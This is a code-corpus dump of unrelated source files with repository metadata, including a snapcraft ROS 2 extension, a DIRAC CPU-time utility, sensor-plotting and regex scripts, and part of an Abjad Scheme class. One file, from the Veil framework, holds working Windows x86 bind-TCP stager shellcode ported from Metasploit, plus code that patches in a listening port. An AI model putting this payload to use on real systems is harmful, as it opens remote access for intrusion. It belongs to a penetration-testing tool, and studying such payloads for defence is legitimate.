gmail(REPLY_TO_ADDRESS,data,subject)
| gpl-2.0 | 7,159,319,071,805,507,000 | 27.230769 | 64 | 0.641235 | false | 3.484177 | false | false | false |
snapcore/snapcraft | snapcraft/internal/project_loader/_extensions/ros2_foxy.py | 2 | 2886 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2020 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Import types and tell flake8 to ignore the "unused" List.
from typing import Any, Dict, Optional, Tuple
from typing_extensions import Final
from ._extension import Extension
_PLATFORM_SNAP = dict(core18="gnome-3-34-1804")
class ExtensionImpl(Extension):
"""Drives ROS 2 build and runtime environment for snap."""
ROS_DISTRO: Final[str] = "foxy"
@staticmethod
def get_supported_bases() -> Tuple[str, ...]:
return ("core20",)
@staticmethod
def get_supported_confinement() -> Tuple[str, ...]:
return ("strict", "devmode")
@staticmethod
def is_experimental(base: Optional[str]) -> bool:
return True
def __init__(self, *, extension_name: str, yaml_data: Dict[str, Any]) -> None:
super().__init__(extension_name=extension_name, yaml_data=yaml_data)
python_paths = [
f"$SNAP/opt/ros/{self.ROS_DISTRO}/lib/python3.8/site-packages",
"$SNAP/usr/lib/python3/dist-packages",
"${PYTHONPATH}",
]
self.root_snippet = {
"package-repositories": [
{
"type": "apt",
"url": "http://repo.ros2.org/ubuntu/main",
"components": ["main"],
"formats": ["deb"],
"key-id": "C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654",
"key-server": "keyserver.ubuntu.com",
"suites": ["focal"],
}
]
}
self.app_snippet = {
"command-chain": ["snap/command-chain/ros2-launch"],
"environment": {
"ROS_DISTRO": self.ROS_DISTRO,
"PYTHONPATH": ":".join(python_paths),
},
}
self.part_snippet = {"build-environment": [{"ROS_DISTRO": self.ROS_DISTRO}]}
self.parts = {
f"ros2-{self.ROS_DISTRO}-extension": {
"source": "$SNAPCRAFT_EXTENSIONS_DIR/ros2",
"plugin": "nil",
"override-build": "install -D -m 0755 launch ${SNAPCRAFT_PART_INSTALL}/snap/command-chain/ros2-launch",
"build-packages": [f"ros-{self.ROS_DISTRO}-ros-core"],
}
}
| gpl-3.0 | -9,029,293,964,805,424,000 | 32.952941 | 119 | 0.578309 | false | 3.767624 | false | false | false |
Andrew-McNab-UK/DIRAC | Core/Utilities/TimeLeft/TimeLeft.py | 2 | 9585 | """ The TimeLeft utility allows to calculate the amount of CPU time
left for a given batch system slot. This is essential for the 'Filling
Mode' where several VO jobs may be executed in the same allocated slot.
The prerequisites for the utility to run are:
- Plugin for extracting information from local batch system
- Scale factor for the local site.
With this information the utility can calculate in normalized units the
CPU time remaining for a given slot.
"""
import os
import DIRAC
from DIRAC import gLogger, gConfig, S_OK, S_ERROR
from DIRAC.Core.Utilities.Subprocess import shellCall
__RCSID__ = "$Id$"
class TimeLeft( object ):
""" This generally does not run alone
"""
#############################################################################
def __init__( self ):
""" Standard constructor
"""
self.log = gLogger.getSubLogger( 'TimeLeft' )
# This is the ratio SpecInt published by the site over 250 (the reference used for Matching)
self.scaleFactor = gConfig.getValue( '/LocalSite/CPUScalingFactor', 0.0 )
if not self.scaleFactor:
self.log.warn( '/LocalSite/CPUScalingFactor not defined for site %s' % DIRAC.siteName() )
self.normFactor = gConfig.getValue( '/LocalSite/CPUNormalizationFactor', 0.0 )
if not self.normFactor:
self.log.warn( '/LocalSite/CPUNormalizationFactor not defined for site %s' % DIRAC.siteName() )
# CPU and wall clock margins, which don't seem to be set anywhere
self.cpuMargin = gConfig.getValue('/LocalSite/CPUMargin', 2) # percent
self.wallClockMargin = gConfig.getValue('/LocalSite/wallClockMargin', 8) # percent
result = self.__getBatchSystemPlugin()
if result['OK']:
self.batchPlugin = result['Value']
else:
self.batchPlugin = None
self.batchError = result['Message']
def getScaledCPU( self, processors = 1 ):
"""Returns the current CPU Time spend (according to batch system) scaled according
to /LocalSite/CPUScalingFactor
"""
# Quit if no scale factor available
if not self.scaleFactor:
return 0
# Quit if Plugin is not available
if not self.batchPlugin:
return 0
resourceDict = self.batchPlugin.getResourceUsage()
if 'Value' in resourceDict:
if resourceDict['Value']['CPU']:
return resourceDict['Value']['CPU'] * self.scaleFactor
elif resourceDict['Value']['WallClock']:
# When CPU value missing, guess from WallClock and number of processors
return resourceDict['Value']['WallClock'] * self.scaleFactor * processors
return 0
#############################################################################
def getTimeLeft( self, cpuConsumed = 0.0, processors = 1 ):
"""Returns the CPU Time Left for supported batch systems. The CPUConsumed
is the current raw total CPU.
"""
# Quit if no scale factor available
if not self.scaleFactor:
return S_ERROR( '/LocalSite/CPUScalingFactor not defined for site %s' % DIRAC.siteName() )
if not self.batchPlugin:
return S_ERROR( self.batchError )
resourceDict = self.batchPlugin.getResourceUsage()
if not resourceDict['OK']:
self.log.warn( 'Could not determine timeleft for batch system at site %s' % DIRAC.siteName() )
return resourceDict
resources = resourceDict['Value']
self.log.debug( "self.batchPlugin.getResourceUsage(): %s" % str( resources ) )
if not resources['CPULimit'] and not resources['WallClockLimit']:
# This should never happen
return S_ERROR( 'No CPU or WallClock limit obtained' )
# if one of CPULimit or WallClockLimit is missing, compute a reasonable value
if not resources['CPULimit']:
resources['CPULimit'] = resources['WallClockLimit'] * processors
elif not resources['WallClockLimit']:
resources['WallClockLimit'] = resources['CPULimit']
# if one of CPU or WallClock is missing, compute a reasonable value
if not resources['CPU']:
resources['CPU'] = resources['WallClock'] * processors
elif not resources['WallClock']:
resources['WallClock'] = resources['CPU']
timeLeft = 0.
cpu = float( resources['CPU'] )
cpuLimit = float( resources['CPULimit'] )
wallClock = float( resources['WallClock'] )
wallClockLimit = float( resources['WallClockLimit'] )
validTimeLeft = enoughTimeLeft(cpu, cpuLimit, wallClock, wallClockLimit, self.cpuMargin, self.wallClockMargin)
if validTimeLeft:
if cpu and cpuConsumed > 3600. and self.normFactor:
# If there has been more than 1 hour of consumed CPU and
# there is a Normalization set for the current CPU
# use that value to renormalize the values returned by the batch system
# NOTE: cpuConsumed is non-zero for call by the JobAgent and 0 for call by the watchdog
# cpuLimit and cpu may be in the units of the batch system, not real seconds... (in this case the other case won't work)
# therefore renormalise it using cpuConsumed (which is in real seconds)
timeLeft = ( cpuLimit - cpu ) * self.normFactor * cpuConsumed / cpu
elif self.normFactor:
# FIXME: this is always used by the watchdog... Also used by the JobAgent
# if consumed less than 1 hour of CPU
# It was using self.scaleFactor but this is inconsistent: use the same as above
# In case the returned cpu and cpuLimit are not in real seconds, this is however rubbish
timeLeft = ( cpuLimit - cpu ) * self.normFactor
else:
# Last resort recovery...
timeLeft = ( cpuLimit - cpu ) * self.scaleFactor
self.log.verbose( 'Remaining CPU in normalized units is: %.02f' % timeLeft )
return S_OK( timeLeft )
else:
return S_ERROR( 'No time left for slot' )
#############################################################################
def __getBatchSystemPlugin( self ):
""" Using the name of the batch system plugin, will return an instance of the plugin class.
"""
batchSystems = {'LSF':'LSB_JOBID', 'PBS':'PBS_JOBID', 'BQS':'QSUB_REQNAME', 'SGE':'SGE_TASK_ID'} # more to be added later
name = None
for batchSystem, envVar in batchSystems.items():
if envVar in os.environ:
name = batchSystem
break
if name is None and 'MACHINEFEATURES' in os.environ and 'JOBFEATURES' in os.environ:
# Only use MJF if legacy batch system information not available for now
name = 'MJF'
if name is None:
self.log.warn( 'Batch system type for site %s is not currently supported' % DIRAC.siteName() )
return S_ERROR( 'Current batch system is not supported' )
self.log.debug( 'Creating plugin for %s batch system' % ( name ) )
try:
batchSystemName = "%sTimeLeft" % ( name )
batchPlugin = __import__( 'DIRAC.Core.Utilities.TimeLeft.%s' % #pylint: disable=unused-variable
batchSystemName, globals(), locals(), [batchSystemName] )
except ImportError as x:
msg = 'Could not import DIRAC.Core.Utilities.TimeLeft.%s' % ( batchSystemName )
self.log.warn( x )
self.log.warn( msg )
return S_ERROR( msg )
try:
batchStr = 'batchPlugin.%s()' % ( batchSystemName )
batchInstance = eval( batchStr )
except Exception as x: #pylint: disable=broad-except
msg = 'Could not instantiate %s()' % ( batchSystemName )
self.log.warn( x )
self.log.warn( msg )
return S_ERROR( msg )
return S_OK( batchInstance )
#############################################################################
def runCommand( cmd, timeout = 120 ):
"""Wrapper around shellCall to return S_OK(stdout) or S_ERROR(message)
"""
result = shellCall( timeout, cmd )
if not result['OK']:
return result
status, stdout, stderr = result['Value'][0:3]
if status:
gLogger.warn( 'Status %s while executing %s' % ( status, cmd ) )
gLogger.warn( stderr )
if stdout:
return S_ERROR( stdout )
if stderr:
return S_ERROR( stderr )
return S_ERROR( 'Status %s while executing %s' % ( status, cmd ) )
else:
return S_OK( str( stdout ) )
def enoughTimeLeft(cpu, cpuLimit, wallClock, wallClockLimit, cpuMargin, wallClockMargin):
""" Is there enough time?
:returns: True/False
"""
cpuRemainingFraction = 100 * (1. - cpu / cpuLimit)
wallClockRemainingFraction = 100 * (1. - wallClock / wallClockLimit)
fractionTuple = ( cpuRemainingFraction, wallClockRemainingFraction, cpuMargin, wallClockMargin )
gLogger.verbose( 'Used CPU is %.1f s out of %.1f, Used WallClock is %.1f s out of %.1f.' % ( cpu,
cpuLimit,
wallClock,
wallClockLimit ) )
gLogger.verbose( 'Remaining CPU %.02f%%, Remaining WallClock %.02f%%, margin CPU %s%%, margin WC %s%%' % fractionTuple )
if cpuRemainingFraction > cpuMargin \
and wallClockRemainingFraction > wallClockMargin:
gLogger.verbose( 'Remaining CPU %.02f%% < Remaining WallClock %.02f%% and margins respected (%s%% and %s%%)' % fractionTuple )
return True
else:
gLogger.verbose( 'Remaining CPU %.02f%% or WallClock %.02f%% fractions < margin (%s%% and %s%%) so no time left' % fractionTuple )
return False
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
| gpl-3.0 | -4,320,293,889,383,008,000 | 40.855895 | 134 | 0.629734 | false | 4.037489 | false | false | false |
Veil-Framework/Veil | tools/ordnance/payloads/x86/bind_tcp.py | 1 | 5084 | """
Bind TCP Payload
Completely ported from Metasploit Framework:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/bind_tcp.rb
"""
import codecs
from lib.common import helpers
class ShellcodeModule:
def __init__(self, cli_arguments):
self.name = "Bind TCP Stager (Stage 1)"
self.description = "Binds to a user provided port and listens for an incoming connection"
self.cli_name = "bind_tcp"
self.platform = "Windows"
self.arch = "x86"
self.port_offset = 197
self.customized_shellcode = ""
self.stager = (
b"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
b"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
b"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
b"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
b"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
b"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
b"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
b"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
b"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
b"\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
b"\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
b"\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31" +
b"\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB" +
b"\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57" +
b"\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5" +
b"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
b"\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
b"\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3" +
b"\x29\xC6\x85\xF6\x75\xEC\xC3")
self.required_options = {
"LPORT": ["", "LPORT value"],
"Encoder": ["None", "Optional: Encoder to use when avoiding bad characters"],
"BadChars": ["\\x00", "Optional: Bad characters to avoid"],
"RHOST": ["", "RHOST value"]
}
def cli_gen_shellcode(self):
'''Invokes payload generating function since nothing special is needed
for cli specifically'''
self.payload_gen()
return
def gen_shellcode(self):
'''Invoked by main menu, generates code'''
self.payload_gen()
return
def payload_gen(self):
port_shellcode_stage = str(hex(int(self.required_options['LPORT'][0])).lstrip('0'))
if len(port_shellcode_stage.lstrip('x')) == 3:
# detect if odd number, is so, need to add a '0' to the front
port_1half = '0' + port_shellcode_stage[0:2].lstrip('x')
port_1half = '\\x' + port_1half
port_2half = port_shellcode_stage[2:4]
port_2half = '\\x' + port_2half
port_shellcode = port_1half + port_2half
elif len(port_shellcode_stage.lstrip('x')) == 4:
port_1half = port_shellcode_stage[1:3]
port_1half = '\\x' + port_1half
port_2half = port_shellcode_stage[3:5]
port_2half = '\\x' + port_2half
port_shellcode = port_1half + port_2half
elif len(port_shellcode_stage.lstrip('x')) == 2:
port_1half = port_shellcode_stage[1:3].lstrip('x')
port_1half = '\\x' + port_1half
port_2half = '00'
port_2half = '\\x' + port_2half
port_shellcode = port_2half + port_1half
elif len(port_shellcode_stage.lstrip('x')) == 1:
port_1half = port_shellcode_stage.lstrip('x')
port_1half = '\\x0' + port_1half
port_2half = '\\x00'
port_shellcode = port_2half + port_1half
stager_shellcode = codecs.encode(self.stager[0:self.port_offset], 'hex')
stager_shellcode = "\\x" + '\\x'.join(codecs.decode(stager_shellcode[i:i + 2], 'utf-8') for i in range(0, len(stager_shellcode), 2))
stager_shellcode += port_shellcode
part_2 = codecs.encode(self.stager[self.port_offset + 2:], 'hex')
part_2 = "\\x" + '\\x'.join(codecs.decode(part_2[i:i + 2], 'utf-8') for i in range(0, len(part_2), 2))
stager_shellcode += part_2
self.customized_shellcode = stager_shellcode
return
def print_shellcode(self):
print(self.customized_shellcode)
return
def payload_stats(self):
print(" [*] Payload Name: " + helpers.color(self.name))
print(" [*] Port: " + helpers.color(str(self.required_options['LPORT'][0])))
print(" [*] Shellcode Size: " + helpers.color(str(len(self.customized_shellcode) / 4).rstrip('.0') + '\n'))
print(self.customized_shellcode)
return
| gpl-3.0 | -1,086,560,340,512,147,300 | 47.884615 | 140 | 0.584579 | false | 2.50814 | false | false | false |
OpenTreeOfLife/reference-taxonomy | util/get_forwards.py | 1 | 1148 | import csv, sys
forwards = {}
# Load legacy forwards
def load_forwards(filename):
infile = open(filename, 'r')
load_forwards_from_stream(infile)
infile.close()
def load_forwards_from_stream(infile):
reader = csv.reader(infile, delimiter='\t')
idcolumn = 0
repcolumn = 1
for row in reader:
if row[idcolumn].isdigit():
forwards[row[idcolumn]] = row[repcolumn]
else:
idcolumn = row.index('id')
repcolumn = row.index('replacement')
# load_forwards(sys.argv[1])
# load_forwards(sys.argv[2])
# want binary mode for output...
def dump_forwards_to_stream(outfile):
writer = csv.writer(outfile, delimiter='\t')
writer.writerow(('id', 'replacement'))
for id in forwards:
target = forwards[id]
i = 0
while target in forwards:
i += 1
if i > 100:
print '** probably cycle', id
break
target = forwards[target]
writer.writerow((id, target))
load_forwards_from_stream(sys.stdin)
outfile = open(sys.argv[1], 'wb')
dump_forwards_to_stream(outfile)
outfile.close()
| bsd-2-clause | 5,068,023,480,321,642,000 | 23.425532 | 52 | 0.597561 | false | 3.679487 | false | false | false |
adjih/openlab | appli/iotlab_examples/smart_tiles/plot_sensors.py | 4 | 4668 | #!/usr/bin/python
# -*- coding: utf-8 -*-
""" plot_sensors.py <filename> <node_id> ...
plot sensors values from <node_id> printed by smart_tiles firmware
saved in filename (by serial_aggregator)
Example of use :
After firmware deployement on m3-29 to m3-32
mypc> aggr.sh 29 30 31 32 > data.txt
mypc> python myplot.py data.txt 29 30 31 32
"""
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
FIELDS = {'time': 0, 'name': 1, 'type': 2, 'X': 3, 'Y': 4, 'Z': 5}
def imu_load(filename):
""" Load iot-lab imu file
Parameters:
------------
filename: string
imu filename saved from smart_tiles firmware
Returns:
-------
data : numpy array
[timestamp node_name sensor_type X Y Z]
"""
try:
mytype = [('time', '<f8'), ('name', '|S11'), ('type', '|S11'),
('X', '<f8'), ('Y', '<f8'), ('Z', '<f8')]
# pylint:disable=I0011,E1101
data = np.genfromtxt(filename, skip_header=1, invalid_raise=False,
delimiter=";", dtype=mytype)
except IOError as err:
sys.stderr.write("Error opening oml file:\n{0}\n".format(err))
sys.exit(2)
except (ValueError, StopIteration) as err:
sys.stderr.write("Error reading oml file:\n{0}\n".format(err))
sys.exit(3)
# Start time to 0 sec
data['time'] = data['time'] - data['time'][0]
return data
def imu_extract(data, node_name='', sensor_type='Acc'):
""" Extract iot-lab imu data for node_name, sensor_type
Parameters:
------------
data: numpy array
[time name type X Y Z]
node_name: string
name of the iot-lab name to be extracted
sensor_type: string
type of the sensor to be extracted 'Acc' or 'Mag'
"""
if node_name != '':
condition = data['name'] == node_name
# pylint:disable=I0011,E1101
filtname_data = np.extract(condition, data)
else:
filtname_data = data
condition = filtname_data['type'] == sensor_type
# pylint:disable=I0011,E1101
filt_data = np.extract(condition, filtname_data)
return filt_data
def imu_plot(data, title):
""" Plot iot-lab imu data
Parameters:
------------
data: numpy array
[time name type X Y Z]
title: string
title of the plot
"""
plt.figure()
plt.grid()
plt.title(title)
plt.plot(data['time'], data['X'])
plt.plot(data['time'], data['Y'])
plt.plot(data['time'], data['Z'])
plt.xlabel('Sample Time (sec)')
return
def imu_all_plot(data, title, ylabel, nodes, sensor_type):
""" Plot iot-lab imu data
Parameters:
------------
data: numpy array
[time name type X Y Z]
title: string
title of the plot
ylabel: stringx
ylabel of the plot
nodes: tab of string
list of nodes_names
"""
nbplots = len(nodes)
if nbplots > 0:
plt.figure()
i = 0
for node in nodes:
i = i + 1
node_plot = plt.subplot(nbplots, 1, i)
node_plot.grid()
plt.title(title + nodes[i-1])
datanode = imu_extract(data, nodes[i-1], sensor_type)
peaknode = imu_extract(data, nodes[i-1], sensor_type+'Peak')
print nodes[i-1], len(datanode)
norm = np.sqrt(datanode['X']**2 + datanode['Y']**2
+ datanode['Z']**2)
node_plot.plot(datanode['time'], norm)
node_plot.plot(peaknode['time'], peaknode['X'], 'ro')
plt.ylabel(ylabel)
plt.xlabel('Sample Time (sec)')
return
def usage():
"""Usage command print
"""
print "Usage"
print __doc__
if __name__ == "__main__":
if len(sys.argv) <= 2:
usage()
else:
filename = sys.argv[1]
# Verif the file existence
if not os.path.isfile(filename):
usage()
sys.exit(1)
# Nodes list
nodes =[]
for arg in sys.argv[2:]:
nodes.append('m3-'+arg)
# extract data from file
data = imu_load(filename)
# Plot all sensors acc sensors
for node in nodes:
#datanode = imu_extract(data, node, sensor_type='Acc')
#imu_plot(datanode, "Accelerometers " + node)
datanode = imu_extract(data, node, sensor_type='Mag')
imu_plot(datanode, "Magnetometers " + node)
# Plot all norm accelerometers on a same windows
#imu_all_plot(data, "Accelerometers ", "Norm Acceleration (G)", nodes, 'Acc')
imu_all_plot(data, "Magnetometers ", "Norm ", nodes, 'Mag')
plt.show()
| gpl-3.0 | 3,069,637,162,765,641,700 | 26.139535 | 87 | 0.550985 | false | 3.447563 | false | false | false |
salceson/kompilatory | lab1/zad1.py | 1 | 4434 | __author__ = 'Piotr Moczurad and Michal Ciolczyk'
import os
import sys
import re
import codecs
re_flags = re.MULTILINE | re.U
author_pattern = re.compile(r'<META NAME="AUTOR" CONTENT="(.+)">', re_flags)
dept_pattern = re.compile(r'<META NAME="DZIAL" CONTENT="(.+)">', re_flags)
key_pattern = re.compile(r'<META NAME="KLUCZOWE_?\d*" CONTENT="(.+)">', re_flags)
text_pattern = re.compile(r'<P>(.+)<META NAME="AUTOR"', re_flags | re.DOTALL)
phrase_pattern = re.compile(r'([\w \-+*:,;\.]+)([\.?!]+|$)', re_flags)
abbrev_pattern = re.compile(r'\s\w{1,4}\.', re_flags)
#lepiej widac na debuggex.com
num_pattern = re.compile(
r'-32768|[-\s](3276[0-7]|327[0-5]\d|327[0-5]\d{2}|32[0-6]\d{3}|3[0-1]\d{4}|[1-2]?\d{1,4})(([.,;:]\s)|\s)', re_flags)
float_pattern = re.compile(r'(-?(\d+\.\d*|\.\d+)(?:(e|E)\-?\d+)?)[.,;:]?\s', re_flags)
#ponizsze regexy czytelne tylko na debuggexie
dates_pattern = re.compile(
r'(?P<yearA>\d{4})(?P<separatorA>[-\./])((?P<monthA1>0[13578]|1[02])'
r'(?P=separatorA)(?P<dayA1>[0-2]\d|3[0-1])|((?P<monthA2>0[469]|11)'
r'(?P=separatorA)(?P<dayA2>[0-2]\d|30))|((?P<monthA3>02)(?P=separatorA)'
r'(?P<dayA3>[0-1]\d|2[0-9])))|((?P<dayB1>[0-2]\d|3[0-1])'
r'(?P<separatorB1>[-\./])(?P<monthB1>0[13578]|1[02])|(?P<dayB2>[0-2]\d|30)'
r'(?P<separatorB2>[-\./])(?P<monthB2>0[469]|11)|(?P<dayB3>[0-1]\d|2[0-9])'
r'(?P<separatorB3>[-\./])(?P<monthB3>02))((?P=separatorB1)|(?P=separatorB2)|(?P=separatorB3))'
r'(?P<yearB>\d{4})',
re_flags) # TODO: Fix accepting 00 as day
emails_pattern = re.compile(
r'([A-Za-z0-9+\-]([A-Za-z0-9+\-]|[A-Za-z0-9+\-\.][A-Za-z0-9+\-])+'
r'@[A-Za-z0-9]([A-Za-z\.0-9][A-Za-z0-9]|[A-Za-z0-9])*\.[A-Za-z0-9]{2,4})',
re_flags)
# uwzglednione zostalo takze to, ze adres e-mail musi konczyc sie TLD
def my_match(pattern, content):
match = pattern.search(content)
if match:
return match.groups()[0]
else:
return ""
def multi_match(pattern, content):
matches = re.findall(pattern, content)
return ", ".join(matches)
def count_matches(pattern, content):
match = pattern.findall(content)
if match:
return len(match)
else:
return 0
def count_different_matches(pattern, content):
match = pattern.findall(content)
if match:
s = set()
for x in match:
s.add(x)
return len(s)
else:
return 0
def count_different_dates(content):
matches = dates_pattern.finditer(content)
if matches:
s = set()
for match in matches:
day = ""
month = ""
year = ""
groups = match.groupdict()
for g in groups:
v = groups[g]
if g[0:3] == "day" and v is not None:
day = v
elif g[0:5] == "month" and v is not None:
month = v
elif g[0:4] == "year" and v is not None:
year = v
s.add(year + "-" + month + "-" + day)
return len(s)
else:
return 0
def count_ints(content):
ints = map(lambda m: m[0] if isinstance(m, tuple) else m,
num_pattern.findall(content))
return len(set(ints))
def process_file(file_path):
fp = codecs.open(file_path, 'rU', 'iso-8859-2')
content = fp.read()
#
# INSERT YOUR CODE HERE
#
fp.close()
print("nazwa pliku: " + file_path)
print("autor: " + my_match(author_pattern, content))
print("dzial: " + my_match(dept_pattern, content))
print("slowa kluczowe: " + multi_match(key_pattern, content))
text = my_match(text_pattern, content)
print("liczba zdan: " + str(count_matches(phrase_pattern, text)))
print("liczba skrotow: " + str(count_different_matches(abbrev_pattern, text)))
print("liczba liczb calkowitych z zakresu int: " + str(count_ints(text)))
print("liczba liczb zmiennoprzecinkowych: " + str(count_different_matches(float_pattern, text)))
print("liczba dat: " + str(count_different_dates(text)))
print("liczba adresow email: " + str(count_different_matches(emails_pattern, text)))
print("\n")
try:
path = sys.argv[1]
except IndexError:
print("Brak podanej nazwy katalogu")
sys.exit(0)
tree = os.walk(path)
for root, dirs, files in tree:
for f in files:
if f.endswith(".html"):
filepath = os.path.join(root, f)
process_file(filepath) | mit | -8,817,545,450,034,686,000 | 31.851852 | 120 | 0.566306 | false | 2.687273 | false | false | false |
andrewyoung1991/abjad | abjad/tools/schemetools/Scheme.py | 1 | 10687 | # -*- encoding: utf-8 -*-
from abjad.tools import stringtools
from abjad.tools.abctools import AbjadValueObject
class Scheme(AbjadValueObject):
r'''Abjad model of Scheme code.
.. container:: example
**Example 1.** A Scheme boolean value:
::
>>> scheme = schemetools.Scheme(True)
>>> print(format(scheme))
##t
.. container:: example
**Example 2.** A nested Scheme expession:
::
>>> scheme = schemetools.Scheme(
... ('left', (1, 2, False)),
... ('right', (1, 2, 3.3))
... )
>>> print(format(scheme))
#((left (1 2 #f)) (right (1 2 3.3)))
.. container:: example
**Example 3.** A variable-length argument:
::
>>> scheme_1 = schemetools.Scheme(1, 2, 3)
>>> scheme_2 = schemetools.Scheme((1, 2, 3))
>>> format(scheme_1) == format(scheme_2)
True
Scheme wraps nested variable-length arguments in a tuple.
.. container:: example
**Example 4.** A quoted Scheme expression:
::
>>> scheme = schemetools.Scheme((1, 2, 3), quoting="'#")
>>> print(format(scheme))
#'#(1 2 3)
Use the `quoting` keyword to prepend Scheme's various quote, unquote,
unquote-splicing characters to formatted output.
.. container:: example
**Example 5.** A Scheme expression with forced quotes:
::
>>> scheme = schemetools.Scheme('nospaces', force_quotes=True)
>>> print(format(scheme))
#"nospaces"
Use this in certain \override situations when LilyPond's Scheme
interpreter treats unquoted strings as symbols instead of strings.
The string must contain no whitespace for this to work.
.. container:: example
**Example 6.** A Scheme expression of LilyPond functions:
::
>>> function_1 = 'tuplet-number::append-note-wrapper'
>>> function_2 = 'tuplet-number::calc-denominator-text'
>>> string = schemetools.Scheme('4', force_quotes=True)
>>> scheme = schemetools.Scheme(
... function_1,
... function_2,
... string,
... )
>>> scheme
Scheme('tuplet-number::append-note-wrapper', 'tuplet-number::calc-denominator-text', Scheme('4', force_quotes=True))
>>> print(format(scheme))
#(tuplet-number::append-note-wrapper tuplet-number::calc-denominator-text "4")
.. container:: example
**Example 7.** A Scheme lambda expression of LilyPond function that
takes a markup with a quoted string argument. Setting verbatim to true
causes the expression to format exactly as-is without modifying quotes
or whitespace:
::
>>> string = '(lambda (grob) (grob-interpret-markup grob'
>>> string += r' #{ \markup \musicglyph #"noteheads.s0harmonic" #}))'
>>> scheme = schemetools.Scheme(string, verbatim=True)
>>> scheme
Scheme('(lambda (grob) (grob-interpret-markup grob #{ \\markup \\musicglyph #"noteheads.s0harmonic" #}))')
>>> print(format(scheme))
#(lambda (grob) (grob-interpret-markup grob #{ \markup \musicglyph #"noteheads.s0harmonic" #}))
Scheme objects are immutable.
'''
### CLASS VARIABLES ###
__slots__ = (
'_force_quotes',
'_quoting',
'_value',
'_verbatim',
)
### INITIALIZER ###
def __init__(self, *args, **kwargs):
if 1 == len(args):
if isinstance(args[0], type(self)):
args = args[0]._value
else:
args = args[0]
quoting = kwargs.get('quoting')
force_quotes = bool(kwargs.get('force_quotes'))
verbatim = kwargs.get('verbatim')
assert isinstance(quoting, (str, type(None)))
if quoting is not None:
assert all(x in ("'", ',', '@', '`', '#') for x in quoting)
self._force_quotes = force_quotes
self._quoting = quoting
self._value = args
self._verbatim = bool(verbatim)
### SPECIAL METHODS ###
def __format__(self, format_specification=''):
r'''Formats scheme.
Set `format_specification` to `''`', `'lilypond'` or ``'storage'``.
Interprets `''` equal to `'lilypond'`.
.. container:: example
**Example 1.** Scheme LilyPond format:
::
>>> scheme = schemetools.Scheme('foo')
>>> format(scheme)
'#foo'
.. container:: example
**Example 2.** Scheme storage format:
::
>>> print(format(scheme, 'storage'))
schemetools.Scheme(
'foo'
)
Returns string.
'''
from abjad.tools import systemtools
if format_specification in ('', 'lilypond'):
return self._lilypond_format
elif format_specification == 'storage':
return systemtools.StorageFormatManager.get_storage_format(self)
return str(self)
def __getnewargs__(self):
r'''Gets new arguments.
Returns tuple.
'''
return (self._value,)
def __str__(self):
r'''String representation of scheme object.
Returns string.
'''
if self._quoting is not None:
return self._quoting + self._formatted_value
return self._formatted_value
### PRIVATE PROPERTIES ###
@property
def _formatted_value(self):
from abjad.tools import schemetools
return schemetools.Scheme.format_scheme_value(
self._value,
force_quotes=self.force_quotes,
verbatim=self.verbatim,
)
@property
def _lilypond_format(self):
if self._quoting is not None:
return '#' + self._quoting + self._formatted_value
return '#%s' % self._formatted_value
@property
def _storage_format_specification(self):
from abjad.tools import systemtools
if stringtools.is_string(self._value):
positional_argument_values = (self._value,)
else:
positional_argument_values = self._value
keyword_argument_names = []
if self.force_quotes:
keyword_argument_names.append('force_quotes')
if self.quoting:
keyword_argument_names.append('quoting')
return systemtools.StorageFormatSpecification(
self,
keyword_argument_names=keyword_argument_names,
positional_argument_values=positional_argument_values,
)
### PUBLIC METHODS ###
@staticmethod
def format_embedded_scheme_value(value, force_quotes=False):
r'''Formats `value` as an embedded Scheme value.
'''
from abjad.tools import datastructuretools
from abjad.tools import schemetools
result = Scheme.format_scheme_value(value, force_quotes=force_quotes)
if isinstance(value, bool):
result = '#{}'.format(result)
elif isinstance(value, datastructuretools.OrdinalConstant):
result = '#{}'.format(repr(value).lower())
elif isinstance(value, str) and not force_quotes:
